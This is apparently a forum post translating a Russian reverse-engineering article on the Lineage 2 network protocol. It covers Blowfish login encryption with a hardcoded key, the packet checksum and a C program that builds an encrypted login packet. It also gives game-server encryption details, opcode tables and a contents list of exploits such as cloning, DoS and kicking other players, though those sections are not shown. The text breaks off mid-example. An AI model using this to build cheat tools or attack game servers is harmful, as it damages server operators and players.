
Can anyone translate it?



I. Introduction

II. Login server

1. Packet encryption
2. Packet structure
3. A RequestAuthLogin packet constructor in C

III. Game server

1. The authorization process
2. Packet encryption
3. Protocol
4. Item ID and Object ID
5. Packet examples:
a) buying and selling
b) private messages
c) the item list
d) talking to an NPC, using skill learning as the example

IV. Problems and how they can be used

1. No limit on the number of authorization attempts
2. Packet encryption
3. Remote detection of a lineage2 server's version
4. Remote "hanging" of a login server
5. Cloning
6. Creating "mutants" and mixing skills
7. Immortality
8. Remote DoS and what it gives
9. Integer overflow in the l2j network code
10. SQL injection
11. Enchant (or a fairy tale about 100% enchant)
12. Geodata (walking through walls)
13. Tricks with SocialAction (0x1b)
14. A bug with Ride (0x6a)
15. Kicking other players' characters out of the game
16. A bug with RequestRestartPoint (resurrection and escaping from jail)
17. Undressing someone else's character without knowing the login or the password: is it really possible?
18. Conclusion

V. Bugs of the new generation

VI. A few words about C4

VII. Epilogue

VIII. References

IX. Appendices to the article

 

 

 

I. Introduction.

What is Lineage? It is a representative of the modern game genre MMORPG (Massively Multiplayer Online Role-Playing Game). I would even say one of the most successful and popular, if not the most =).

Of course, it is hard to talk about the popularity of this game, since counting the exact number of people "involved" in lineage is probably impossible, but servers such as www.lineageii.ru (with a peak of 10,000 registered players online) and the official www.lineage2.com (with all its 100,000 paying users) make it clear that the figure must be impressive. The essence of the game is that (as in any other RPG) you have a character and a huge world in which you need to obtain money, clothes, weapons and experience, and finally to fight players like yourself and flatter your vanity with victories. For some people, for whom real life does not work out, it allows self-realization in a virtual world: becoming a famous warrior and even finding a bride (yes, girls play lineage too). Among all other online (and not only online) games, lineage wins you over with its graphics. Personally, at first it seemed incredible to me that someone could create such wonderful three-dimensional beauty for a mere game. But the game has its dark sides too. First, it has a tendency to pull you in. And not just pull you in, but cause an addiction which is extremely hard to fight. Second, understand that in an industry in which hundreds of thousands of gamers from practically all layers of society are involved, nothing happens without money (as with everything in our life). Some people have a family and a job and simply do not have the time to spend months levelling a character up to the required level. This layer of gamers gave birth to people who started selling game levels and items for real money, thus creating a new niche in the world of lineage. At present, depending on the size of a server (and its rates), the cost of a well-dressed high-level character ranges from $300 (on the dying www.antaras.ru) to $5,000 on an official server. The funniest thing is buying items from the administration of a server. Think about it: a gamer pays the price of N killed raccoons for an administrator to add one record to the game database. That is how money is made out of thin air. Well, I got carried away describing the game =) It shows: a year was spent on it. Of course, in such an industry (where money and a crowd of naive and, at times, silly gamers circulate) nothing happens without us, inquisitive minds. Some buy characters, some create and level them themselves; we choose the third, untrodden path.

The thing is that in the several years this game has existed, not a single vulnerability has been found in it (apart from purely game bugs), and not a single program has been written that could open access to other people's accounts to attackers. And you know why? It seems to me that the young and inexperienced (whose posts fill bugtraq) were put off by the encryption of packets in lineage. And even in decrypted form, they look like a chaotic set of characters. Perhaps the old-timers remember my article about the client-server protocol and vulnerabilities of Half-Life (www.securitylab.ru/analytics/216301.php). The purpose of that article was to describe the game and to hand over on a plate almost everything I had achieved in studying it. In this article I will tell how to decrypt lineage2 traffic, tell a little about the protocol's features, and give some of my (and others') findings; everything else I will not publish, because general use of it could lead to chaos in this beautiful, balanced and fully formed virtual world =)

 

ATTENTION.

1. I warn at once that I will sometimes refer back to the half-life article: the analogies will help you understand what is written more easily. And make it easier for me to write.

2. The article was written on the basis of analyzing decrypted packets and studying the source code of the l2j lineage2 server, written in Java. Accordingly, the article is 100% valid for l2j, and valid for the official server to the extent that l2j is faithful to it =)

3. All source code was written under Linux. For compilation a blowfish library is needed. The libraries from the openssl package will do with small changes to the code.

4. By the way, about changes to the code. The source code given in the article contains small logic mistakes to prevent its thoughtless use. If you work through the article, fixing them will not be a problem.

5. And the last. The full version of the article was for a long time available only to a limited number of people, and with the release of the C4 version of lineage2 and the fixing of most of the bugs it became sharply obsolete. About C4 I will say a little at the end.

 

II. Login server.

Introduction. Let us start with the fact that the lineage2 developers separated the login server from the game server in order to offload, more or less, the already overloaded channel of the game server. Besides, the login server has a tendency to hang (this began with the C3 version of lineage and continues to this day) and stop letting users onto the server, while those who are already playing feel no discomfort at all =) And since nobody could find the bug and clearly explain to the developers where it crept in, it remains unfixed to this day. And so, in spite of all the charm of the idea of offloading the game channel, our domestic administrators stubbornly put the login server on the same machine as the game server.

1. Packet encryption.

For encrypting the packets the login server exchanges with the client, lineage uses Blowfish. Yes, the algorithm developed by Bruce Schneier in 1993. About Blowfish it is important to know that it is a symmetric block cipher. Symmetric means that the algorithm uses one secret key with which data is both encrypted and decrypted. Speaking specifically about Blowfish: from this key 18 32-bit sub-keys (the P-array) and 4 S-boxes of 256 32-bit words each are generated, and the data is then encrypted and decrypted with those. Block cipher means that Blowfish processes data in blocks (of 8 bytes). It also means that if the integrity of the ciphertext is broken, we cannot recover the damaged part. With regard to lineage, it must be said that the key from which the sub-keys are generated is a constant and is written plainly in the l2j source code (this is where 99% of lineage researchers failed: they assumed the key had to be transmitted in one of the packets; see the references at the end). It is also important to note that the first 2 bytes of a packet are not encrypted. With encryption, I think, we are done. Let us move on.

 

 

2. Packet structure.

The first two bytes of a packet (the ones that are not encrypted) contain the length of the packet (as in halflife). The next byte carries the packet type.

The login server processes these packets:

0x00 - RequestAuthLogin (authorization request; contains the login and the password)
0x02 - RequestServerLogin (request to enter a game server)
0x05 - RequestServerList (request for the list of servers)

To the others it simply does not respond, leaving only a record in the logs.

The client processes packets of the following types:

0x01 - authorization failed
0x03 - you are successfully authorized
0x04 - the answer to RequestServerLogin
0x06 - the answer to RequestServerList

as well as a few additional packets about an account ban, version check and so on; they are listed below. The next byte supplements the requests described above. For example, if the server answered our authorization request with a packet of type 0x01, the next byte contains the reason authorization failed (the important ones for us: 0x03 - incorrect login or password, 0x07 - someone is already using the account, 0x11 - a temporary password is set). But this byte is not always a service byte: in RequestAuthLogin packets, for example, the login begins at this byte. Then follow N bytes which are no longer control bytes but carry information defined by the packet type; for RequestAuthLogin this field contains the login and the password. The last 8 bytes of a packet have a special purpose: they hold a 32-bit checksum of everything preceding them (except, again, the first two bytes of the packet), followed by 4 bytes of padding. How is this checksum computed? The data is split into consecutive 32-bit words. The first is XORed with the second, the result is XORed with the next word, and so on. An example of computing the checksum is shown below.
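The server-side check that this structure implies, written here as an added example (it is not code from the article): it reads the two length bytes, locates the 8-byte trailer and recomputes the XOR of the 32-bit words over everything in between. The constructed input is the unencrypted RequestAuthLogin dump that the constructor program further down prints for login m00 / password ownzu; on the wire this check only applies after the Blowfish layer has been removed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read a little-endian 32-bit word. */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Login-server checksum: XOR of all little-endian 32-bit words in data[0..len).
 * A trailing partial word (len not a multiple of 4) is ignored. */
uint32_t l2_login_checksum(const unsigned char *data, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 4 <= len; i += 4)
        sum ^= le32(data + i);
    return sum;
}

/*
 * Verify a decrypted login-server packet.
 *   pkt[0..1]  total length, little-endian, counting the 2 length bytes
 *   pkt[2..]   payload (type byte first); its last 8 bytes are the
 *              4-byte checksum followed by 4 bytes of padding
 * The checksum covers the payload minus that 8-byte trailer.
 * Returns 1 if it matches, 0 if not, -1 if the length field is unusable.
 */
int l2_login_verify(const unsigned char *pkt, size_t buflen)
{
    if (buflen < 2)
        return -1;
    size_t total = (size_t)pkt[0] | ((size_t)pkt[1] << 8);
    /* never trust the peer's length beyond what actually arrived */
    if (total > buflen || total < 2 + 8 || (total - 2) % 4 != 0)
        return -1;
    size_t covered = total - 2 - 8;
    uint32_t expect = le32(pkt + 2 + covered);
    return l2_login_checksum(pkt + 2, covered) == expect;
}

/* Constructed sample: the plaintext RequestAuthLogin dump from the
 * constructor's output (login "m00", password "ownzu"). */
static const unsigned char SAMPLE_AUTH[0x32] = {
    0x32,0x00,0x00,0x6d,0x30,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x6f,0x77,0x6e,0x7a,0x75,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x03,0x4a,0x22,0x00,0x00,
    0x00,0x00
};

/* Checksum over the covered region of the sample (bytes 2..41). */
uint32_t sample_auth_checksum(void)
{
    return l2_login_checksum(SAMPLE_AUTH + 2, sizeof SAMPLE_AUTH - 2 - 8);
}

int sample_auth_verify(void)
{
    return l2_login_verify(SAMPLE_AUTH, sizeof SAMPLE_AUTH);
}

/* Flip one bit of the login field: the XOR no longer matches. */
int sample_auth_tampered_verify(void)
{
    unsigned char t[sizeof SAMPLE_AUTH];
    memcpy(t, SAMPLE_AUTH, sizeof t);
    t[3] ^= 0x01;                 /* 'm' -> 'l' */
    return l2_login_verify(t, sizeof t);
}

/* A packet whose length field claims more bytes than were received is
 * rejected before anything past the buffer is read. */
int sample_auth_short_buffer(void)
{
    return l2_login_verify(SAMPLE_AUTH, 20);
}
```

The checksum is an integrity check against corruption, not authentication: anyone holding the static Blowfish key can produce a valid checksum for any payload, and two flips of the same bit position in different words cancel out.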

 

3. A RequestAuthLogin packet constructor in C.

Now that we understand the packet structure, we can implement in a program everything that was described by hand above.

Code:

 

 

/*

la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor

Helps to understand lineage2 authentication.

darkgrey / m00.blackhat.ru

Build on Linux against OpenSSL's Blowfish: gcc la2-example.c -o la2-example -lcrypto

*/

#define OPENSSL_SUPPRESS_DEPRECATED   // the BF_* functions are deprecated in OpenSSL 3 but still shipped
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <openssl/blowfish.h>          // the original included a local blowfish.h with the same API

// key length
#define KEY_LEN 20

// The length of a RequestAuthLogin packet is constant and equals AUTH_PKT_LEN + 2 (the length field)
#define AUTH_PKT_LEN 0x30

// sizes of the login and password fields
#define LOGIN_LEN 14
#define PASS_LEN 16

// Key from which the sub-keys are generated (a constant in the l2j sources)
static const unsigned char key[] = "[;'.]94-31==-&%@!^+]";

// After key setup holds the 18 P sub-keys and the 4 S-boxes
static BF_KEY bfkey;

// lineage2 reads and writes 32-bit words little-endian, both on the wire and inside a Blowfish block
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff;
    p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff;
    p[3] = (v >> 24) & 0xff;
}

// Computes the checksum of the first count bytes (XOR of their 32-bit words) and stores it right after them
static void add_checksum(unsigned char *raw, int count)
{
    uint32_t chksum = 0;
    int i;

    for (i = 0; i + 4 <= count; i += 4)
        chksum ^= le32(raw + i);

    printf("checksum: 0x%x\n", (unsigned)chksum);
    memcpy(raw + count, &chksum, 0); // no-op kept out; the real store is little-endian below
    put_le32(raw + count, chksum);
}

// Puts the login and the password into the packet (separate from the main function for readability);
// each string is cut to its field so that a long value cannot run into the next field
static void add_lp(unsigned char *raw, const char *l, const char *p)
{
    size_t ll = strlen(l), pl = strlen(p);

    memcpy(raw + 3, l, ll > LOGIN_LEN ? LOGIN_LEN : ll);
    memcpy(raw + 3 + LOGIN_LEN, p, pl > PASS_LEN ? PASS_LEN : pl);
}

// Prints a packet in readable form (for debugging)
static void print_packet(const unsigned char *raw, int len)
{
    int i, c = 0;

    for (i = 0; i < 54; i++) printf("_");

    for (i = 0; i < len + 2; i++) {
        if ((c % 0x10) == 0) printf("\n0x%.2x | ", c);
        printf("%.2x ", raw[i]);
        c++;
    }
    printf("\n\n");
}

// The main function, which builds the packet
static void build_auth_packet(const char *login, const char *pwd)
{
    int count = AUTH_PKT_LEN / 8;   // number of 8-byte Blowfish blocks
    int i;
    // RequestAuthLogin packet skeleton; every byte not listed is zero
    unsigned char packet_skeleton[AUTH_PKT_LEN + 2] = {
        [0] = 0x32, [1] = 0x00,             // packet length, constant: 0x30 + 0x02
        [2] = 0x00,                         // packet type (0x00 - RequestAuthLogin)
        // [3..16]  login (14 bytes), [17..32] password (16 bytes): filled by add_lp
        [3 + LOGIN_LEN + PASS_LEN] = 0x08,  // marks the end of the login/password section
        // [34..41] not used in c3 (reserved?), [42..45] checksum, [46..49] padding
    };

    // add login and password to the packet
    add_lp(packet_skeleton, login, pwd);

    // add the checksum over the type byte, login, password, marker and reserved bytes
    add_checksum(packet_skeleton + 2, AUTH_PKT_LEN - 8);

    printf("Auth packet dump (non-crypted):\n");
    print_packet(packet_skeleton, AUTH_PKT_LEN);

    // Encrypt in 8-byte blocks, skipping the 2 length bytes. Each block goes into Blowfish
    // as two little-endian 32-bit words (the original's raw BF_encrypt cast did the same on x86)
    for (i = 0; i < count; i++) {
        unsigned char *blk = packet_skeleton + 2 + i * 8;
        BF_LONG w[2] = { le32(blk), le32(blk + 4) };
        BF_encrypt(w, &bfkey);
        put_le32(blk, (uint32_t)w[0]);
        put_le32(blk + 4, (uint32_t)w[1]);
    }

    printf("Auth packet dump (encrypted):\n");
    print_packet(packet_skeleton, AUTH_PKT_LEN);
}

int main(void)
{
    char login[] = "m00",   // test login
         pwd[] = "ownzu";   // password

    printf("\nla2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor\n\n");

    // generate the sub-keys
    BF_set_key(&bfkey, KEY_LEN, key);

    // build the packet
    build_auth_packet(login, pwd);
    return 0;
}

/* eof */

 

 

 

Here is what the program printed on my box:

 

bash-2.05b$ ./a.out

 

la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor

 

checksum: 0x224a0377

Auth packet dump (non-crypted):

______________________________________________________

0x00 | 32 00 00 6d 30 30 00 00 00 00 00 00 00 00 00 00

0x10 | 00 6f 77 6e 7a 75 00 00 00 00 00 00 00 00 00 00

0x20 | 00 08 00 00 00 00 00 00 00 00 77 03 4a 22 00 00

0x30 | 00 00

 

Auth packet dump (encrypted):

______________________________________________________

0x00 | 32 00 09 d9 97 e2 29 89 8c b5 1a a0 1a 83 74 43

0x10 | 39 fc 2f 03 c3 26 9c 65 b0 c4 20 28 11 c1 6a 95

0x20 | 3e 44 45 46 2a ae b9 18 91 2e 75 56 d0 dc 40 b5

0x30 | 77 2a

 

bash-2.05b$

 

III. Game server

1. The authorization process on the login server and entering the game server.

Authorization on the login server happens in several stages.

1) The login server sends us a greeting in the form of an 11-byte packet (in general it contains version information).
2) We answer it with a RequestAuthLogin request.
3) If the password is correct, it sends us a packet with the 32-bit number of our account (it is always constant); let us call it SessionKey 1.
4) We send RequestServerList, and the server answers with the list of game servers, containing their ports, the number of players online and the maximum number of players.
5) We send RequestServerLogin, on which the server checks our AccessLevel (if it equals -1, we are banned) and, depending on our login, password, access level and socket, generates a unique 32-bit SessionKey 2, with which we will subsequently be authorized on the game server. If the game server is down, simulates that state (administrators do this for maintenance) or is simply full, it refuses us.
6) If all is well, we go to the game server. We send it a certain packet (different for each C3 server, but constant), to which it answers with a 12-byte packet containing the first 4 bytes of the key; appended to another 4 constant bytes they give a 64-bit key. Later we use it to decrypt and encrypt game packets. It is important to note that with every encrypted packet, its length is added to the first part of the key.
7) We send it the login and the two identifiers (already encrypted) which we received in the session with the login server. In reply we receive the list of characters.

So, in 7 stages we are authorized on the server =) Complicated, but safe. Probably some of you have a question: is it possible to enter a game server directly, without the login server's participation? I will write about that below.

2. Packet encryption

As I already wrote above, for encrypting game packets lineage uses a 64-bit key. Its first 4 bytes are taken from the very first packet of the game server, the second 4 are constant. Then the N-th byte of the plaintext is XORed with the N-th byte of the key (the key is cycled every 8 bytes) and with the previous byte of the output (masked to 0xFF); the result is the N-th byte of the ciphertext. Every byte, starting from the first, is encrypted by this algorithm. As you can see, how each subsequent byte is encrypted depends on the previous one, which means that if the first part of a packet is damaged for whatever reason, or simply missing, we cannot decrypt the second part. Well, that is by the way; actually it is not important for us. It is also important to note that the first part of the key is variable: with every decrypted packet the length of its data is added to the first 4 bytes. That is, having the initial key (from the moment of connecting to the server) and having pulled one packet out of the middle of a session with the game server, we cannot decrypt it; for that we need to recover all the packets that came before it. In principle, the number of possible key combinations is about 423 million. Given the simplicity of the algorithm, modern computers can do about 10,000 iterations a second (maybe even more) and find the key in 12 hours at most. But for that we need to know at least something about the contents of the packet. Why did the authors make the key variable? I think it is clear: for security. Although, we are talking about TCP (rather than UDP, as in halflife), where it is extremely inconvenient for an outsider to "inject" into a session.

3. Protocol.

As in the login-server packets, the first two bytes hold the length. The next byte denotes the packet type. Here are the packet types which the lineage2 C3 client processes (I will comment on some of them):

Code:

// sent by the login server

0x01 loginfail2

0x02 accountKicked1

0x03 loginok

0x04 serverlist

0x05 serverfail

0x06 playfail

0x07 playok

0x08 accountKicked

0x09 blockedAccMsg // banned

0x20 protocol version different

0x00 VersionCheck

 

// sent by the game server

0x01 MoveToLocation

0x02 NpcSay

0x03 CharInfo // Means surrounding characters

0x04 UserInfo

0x06 Attack

0x07 Attack

0x08 Attacked

0x09 Attacked

0x0a AttackCanceld

0x0b Die

0x0c Revive

0x0d AttackOutOfRange

0x0e AttackInCoolTime

0x0f AttackDeadTarget

0x10 LeaveWorld

0x11 AuthLoginSuccess

0x12 AuthLoginFail

0x13 CharList // The chars list

0x15 SpawnItem // On some C3 servers, the answer to character selection

0x16 DropItem // On some C3 servers, carries information about a mob

0x17 GetItem

0x18 EquipItem

0x19 UnequipItem

0x1a StatusUpdate

0x1b NpcHtmlMessage // On some C3 servers, carries the list of items with their ItemID and ObjectID

0x1c SellList

0x1d BuyList

0x1e DeleteObject

0x1f CharSelectInfo

0x20 LoginFail

0x21 CharSelected

0x22 NpcInfo

0x23 NewCharacterSuccessPacket

0x24 NewCharacterFailPacket

0x25 CharCreateOk

0x26 CharCreateFail

0x27 ItemList

0x28 SunRise

0x29 SunSet

0x2a EquipItemSuccess // Has become outdated

0x2b EquipItemFail // Has become outdated

0x2c UnEquipItemSuccess // Has become outdated

0x2d UnEquipItemFail // Has become outdated

0x2e TradeStart

0x2f TradeStartOk // Has become outdated

0x30 TradeOwnAdd

0x31 TradeOtherAdd

0x32 TradeDone

0x33 CharDeleteSuccess

0x34 CharDeleteFail

0x35 ActionFail

0x36 ServerClose

0x37 InventoryUpdate

0x38 TeleportToLocation

0x39 TargetSelected

0x3a TargetUnselected

0x3b AutoAttackStart

0x3c AutoAttackStop

0x3d SocialAction

0x3e ChangeMoveType

0x3f ChangeWaitType

0x40 NetworkFail // Has become outdated

0x43 CreatePledge

0x44 AskJoinPledge

0x45 JoinPledge

0x46 WithdrawalPledge

0x47 OustPledgeMember

0x48 SetOutPledgeMember

0x49 DismissPledge

0x4a SetDismissPledge

0x4b AskJoinParty

0x4c JoinParty

0x4d WithdrawalParty

0x4e OustPartyMember

0x4f SetOustPartyMember

0x50 DismissParty

0x51 SetDismissParty

0x52 MagicAndSkillList

0x53 WarehouseDepositList

0x54 WarehouseWithdrawalList

0x55 WarehouseDone

0x56 ShortCutRegister

0x57 ShortCutInit

0x58 ShortCutDelete

0x59 StopMove

0x5a MagicSkillUser

0x5b MagicSkillCanceld

0x5d CreatureSay

0x5e EquipUpdate

0x5f StopMoveWithLocation

0x60 DoorInfo

0x61 DoorStatusUpdate

0x63 PartySmallWindowAll

0x64 PartySmallWindowAdd

0x65 PartySmallWindowDeleteAll

0x66 PartySmallWindowDelete

0x67 PartySmallWindowUpdate

0x68 PledgeShowMemberListAll

0x69 PledgeShowMemberListUpdate

0x6a PledgeShowMemberListAdd

0x6b PledgeShowMemberListDelete

0x6c MagicList // Has become outdated

0x6d SkillList

0x6e VehicleInfo

0x6f VehicleDeparture

0x70 VehicleCheckLocation

0x71 GetOnVehicle

0x72 GetOffVehicle

0x73 TradeRequest

0x74 RestartResponse

0x75 MoveToPawn

0x76 SetTo

0x77 StartRotating

0x78 FinishRotating

0x79 MoveBackwardToLocation // Seen when a skill is used or on "to the nearest village" after death

0x7a SystemMessage

0x7d StartPledgeWar

0x7e ReplyStartPledgeWar

0x7f StopPledgeWar

0x80 ReplyStopPledgeWar

0x81 SurrenderPledgeWar

0x82 ReplySurrenderPledgeWar

0x83 SetPledgeCrest // Has become outdated

0x84 PledgeCrest

0x85 SetupGauge

0x86 ShowBoard

0x87 ChooseInventoryItem

0x89 MoveToLocationInVehicle

0x8a StopMoveInVehicle

0x8b ValidateLocationInVehicle

0x8c TradeOtherAdd2

0x8d TradePressOwnOK // Has become outdated

0x8e MagicSkillLaunched

0x8f FriendAddRequestResult

0x90 FriendAdd // Has become outdated

0x91 FriendRemove // Has become outdated

0x92 FriendList // Has become outdated

0x93 FriendStatus // Has become outdated

0x94 TradePressOtherOk // Has become outdated

0x95 FriendAddRequestResult2

0x96 LeaveWorld2

0x97 AbnormalStatusUpdate

0x98 QuestList

0x99 EnchantResult

0x9a AuthServerList // Has become outdated

0x9b PledgeShowMemberListDeleteAll

0x9c PledgeInfo

0x9d PledgeExtendedInfo

0x9e SurrenderPersonally

0x9f Ride

0xa1 PledgeShowInfoUpdate

0xa2 ClientAction

0xa3 AquireSkillList

0xa4 AquireSkillInfo

0xa5 ServerObjectInfo

0xa6 HideGm

0xa7 AquireSkillDone

0xa8 GMViewCharacterInfo

0xa9 GMViewPledgeInfo

0xaa GMViewSkillInfo

0xab GMviewMagicInfo

0xac GMViewQuestInfo

0xad GMViewItemList

0xae GMViewWarehouseWithdrawList

0xaf PartyMatchList

0xb0 PartyMatchDetail

0xb1 PlaySound

0xb2 StaticObject

0xb3 PrivateSellList2

0xb4 PrivateBuyList2

0xb5 PrivateStoreMsg

0xb6 ShowMinimapPacket

0xb7 ReviveRequest // Has become outdated

0xb8 AbnormalVisualEffect

0xb9 TutorialShowHtml

0xba TutorialShowQuestionMark

0xbb TutorialEnableClientEvent

0xbc TutorialClose

0xbd ShowRadar

0xbe DeleteRadar

0xbf MyTargetSelected

0xc0 PartyMemberPosition

0xc1 AskJoinAlliance

0xc2 JoinAlliance

0xc3 WithdrawAlliance

0xc4 OustAllianceMemberPledge

0xc5 DismissAlliance

0xc6 SetAllianceCrest // Has become outdated

0xc7 ReceiveAllyCrest

0xc8 ServerCloseSocket // Has become outdated

0xc9 PetStatusShow

0xca PetInfo

0xcb PetItemList

0xcc PetInventoryUpdate

0xcd AllianceInfo // Has become outdated

0xce PetStatusUpdate

0xcf PetDelete

0xd0 PrivateSellList

0xd1 PrivateBuyList

0xd2 PrivateStoreMsg

0xd3 VehicleStart

0xd4 RequestTimeCheck

0xd5 StartAllianceWar

0xd6 ReplyStartAllianceWar // Has become outdated

0xd7 StopAllianceWar

0xd8 ReplyStopAllianceWar // Has become outdated

0xd9 SurrenderAllianceWar // Has become outdated

0xda SkillCoolTimePacket

0xdb PackageToListPacket

0xdc PackageSendableListPacket

0xdd EarthQuake

0xde FlyToLocation

0xdf BlockList // Has become outdated

0xe0 SpecialCamera

0xe1 NormalCamera

0xe2 CastleSiegeInfoPacket

0xe3 CastleSiegeAttackerList

0xe4 CastleSiegeDefenderList

0xe5 NickNameChanged

0xe6 PledgeStatusChanged

0xe7 RelationChanged

0xe8 OnEventTrigger

0xe9 MultiSellListPacket

0xea SetSummonRemainTime

0xeb OnSkillRemainSec

0xec NetPingPacket

 

 

 

From the client to the server:

Code:

 

0x01 MoveBackwardToLocation

0x02 Say

0x03 EnterWorld

0x04 Action

0x08 RequestAuthLogin

0x09 Logout

0x0a Attack

0x0b CharacterCreate

0x0c CharacterDelete

0x0d CharacterSelect

0x0e NewCharacter

0x0f ItemList

0x10 RequestEquipItem

0x11 RequestUnEquipItem

0x12 RequestDropItem

0x12 RequestDropItemFromPet

0x14 UseItem

0x15 TradeRequest

0x16 AddTradeItem

0x17 TradeDone

0x1a RequestTeleport

0x1b SocialAction

0x1c ChangeMoveType // Obsolete. 'RequestActionUse' is used now

0x1d ChangeWaitType // Obsolete. 'RequestActionUse' is used now

0x1e RequestSellItem

0x1f RequestBuyItem

0x20 RequestLinkHtml

0x21 RequestBypassToServer

0x22 RequestBBSwrite

0x23 RequestCreatePledge

0x24 RequestJoinPledge

0x25 RequestAnswerJoinPledge

0x26 RequestWithDrawalPledge

0x27 RequestOustPledgeMember

0x28 RequestDismissPledge

0x29 RequestJoinParty

0x2a RequestAnswerJoinParty

0x2b RequestWithDrawalParty

0x2c RequestOustPartyMember

0x2d RequestDismissParty

0x2e RequestMagicSkillList

0x2f RequestMagicSkillUse

0x30 Appearing

0x31 SendWareHouseDepositList

0x32 SendWareHouseWithDrawList

0x33 RequestShortCutReg

0x34 RequestShortCutUse

0x35 RequestShortCutDel

0x37 RequestTargetCancel

0x38 Say2 // private messages (on some servers, e.g. la2.ru, 0x39 is used)

0x3c RequestPledgeMemberList

0x3e RequestMagicList

0x3f RequestSkillList

0x41 MoveWithDelta

0x42 GetOnVehicle

0x43 GetOffVehicle

0x44 AnswerTradeRequest

0x45 RequestActionUse

0x46 RequestRestart

0x47 RequestSiegeInfo

0x48 ValidatePosition

0x49 RequestSEKCustom

0x4a StartRotating

0x4b FinishRotating

0x4d RequestStartPledgeWar

0x4e RequestReplyStartPledgeWar

0x4f RequestStopPledgeWar

0x50 RequestReplyStopPledgeWar

0x51 RequestSurrenderPledgeWar

0x52 RequestReplySurrenderPledgeWar

0x53 RequestSetPledgeCrest

0x55 RequestGiveNickName // Generally used by a clan leader to set a title. Might be good for something...

0x57 RequestShowboard

0x58 RequestEnchantItem

0x59 RequestDestroyItem

0x5b SendBypassBuildCmd

0x5e RequestFriendInvite

0x5f RequestFriendAddReply

0x60 RequestFriendList

0x61 RequestFriendDel

0x62 CharacterRestore

0x63 RequestQuestList

0x64 RequestDestroyQuest

0x66 RequestPledgeInfo

0x67 RequestPledgeExtendedInfo

0x68 RequestPledgeCrest

0x69 RequestSurrenderPersonally

0x6a Ride

0x6b RequestAcquireSkillInfo

0x6c RequestAcquireSkill

0x6d RequestRestartPoint

0x6e RequestGMCommand

0x6f RequestPartyMatchConfig

0x70 RequestPartyMatchList

0x71 RequestPartyMatchDetail

0x72 RequestCrystallizeItem

0x73 RequestPrivateStoreManage

0x74 SetPrivateStoreList

0x75 RequestPrivateStoreManageCancel

0x76 RequestPrivateStoreQuit

0x77 SetPrivateStoreMsg

0x78 RequestPrivateStoreList

0x79 SendPrivateStoreBuyList

0x7a ReviveReply

0x7b RequestTutorialLinkHtml

0x7c RequestTutorialPassCmdToServer

0x7d RequestTutorialQuestionMark

0x7e RequestTutorialClientEvent

0x7f RequestPetition

0x80 RequestPetitionCancel

0x81 RequestGMList

0x82 RequestJoinAlly

0x83 RequestAnswerJoinAlly

0x84 RequestWithdrawAlly

0x85 RequestOustAlly

0x86 RequestDismissAlly

0x87 RequestSetAllyCrest

0x88 RequestAllyCrest

0x89 RequestChangePetName

0x8a RequestPetUseItem

0x8b RequestGiveItemToPet

0x8c RequestGetItemFromPet

0x8e RequestAllyInfo

0x8f RequestPetGetItem

0x90 RequestPrivateStoreBuyManage

0x91 SetPrivateBuyList

0x92 RequestPrivateStoreBuyManageCancel

0x93 RequestPrivateStoreBuyQuit

0x94 SetPrivateBuyMsg

0x95 RequestPrivateStoreBuyList

0x96 SendPrivateStoreBuyBuyList

0x97 SendTimeCheckPacket

0x98 RequestStartAllianceWar

0x99 ReplyStartAllianceWar

0x9a RequestStopAllianceWar

0x9b ReplyStopAllianceWar

0x9c RequestSurrenderAllianceWar

0x9d RequestSkillCoolTime

0x9e RequestPackageSendableItemList

0x9f RequestPackageSend

0xa0 RequestBlock

0xa1 RequestCastleSiegeInfo

0xa2 RequestCastleSiegeAttackerList

0xa3 RequestCastleSiegeInfo

0xa4 RequestJoinCastleSiege

0xa5 RequestConfirmCastleSiegeWaitingList

0xa6 RequestSetCastleSiegeTime

0xa7 RequestMultiSellChoose

0xa8 NetPing

 

 

 

As you can see, most client packets begin with the word Request. Indeed, the whole game process looks roughly like this: the server constantly sends us the state of the world, the positions of mobs/players/NPCs and so on, and when we need something (to move, attack, etc.) we send a "request". It is all very simple.

4. Item ID and Object ID

Every thing (item, NPC) in the game has a 16/32-bit identifier (trades: 8-bit). Its point is, you see, that it is more convenient to send a 2/4-byte number over the network than a phrase of length N such as "Crystal Scroll: Enchant Weapon (Grade B)" or an NPC name like "Magister MacTePqpJlOMaCTeP". As you understand, it serves to identify a particular object. The list of these identifiers and the NPCs/items corresponding to them is stored both on the server and on the client, and they are not synchronized in any way. That is, if this table is changed on the server, the client has to be patched as well; this is one of the reasons every server has its own patch.

Besides this identifier there is also a 32-bit Object ID. On entering the game world, the server assigns a unique OID to each item the character carries, and the OID of each subsequent item is the current OID minus 1. That is, the OID is not generated randomly at all, but in order. After assignment the OID is reserved, so that nobody else can receive the same one. This information, by the way, is not confirmed by the source code; it is my own conclusion. If it were not so, then after a full cycle (from 0xFFFFFFFF to 0x00000000) an already occupied OID could be assigned to a new item, which would lead to unpredictable consequences (the possibility of cloning, or a plain server crash). But the thing is that the OID range is quite large :) To be more exact, OIDs have to be assigned to ~4.3 billion things to go through a full cycle, which even on a server with a huge online population would take N days (maybe even weeks). Once more I repeat, this is all an assumption. But the fact is that I, for example, have not seen a single la2 server (even an official one) with an uptime of more than a week. Maybe the problem is exactly this? On the whole, OIDs are needed to fight cloning, or rather to detect it. As for NPCs, their OIDs are issued by the same law, but when the NPC appears in the world. The same for characters' OIDs.

 

5. Examples of packages.

 

a) purchase of subjects to put on buying up a subject, we need to take advantage with 3 of packages. The first 0x94 (SetPrivateBuyMsg). Apparently from the name it establishes that message which will be is deduced above a head at the Persian during the moment of trade (what on a yellow background). Here an example:

Код:

 

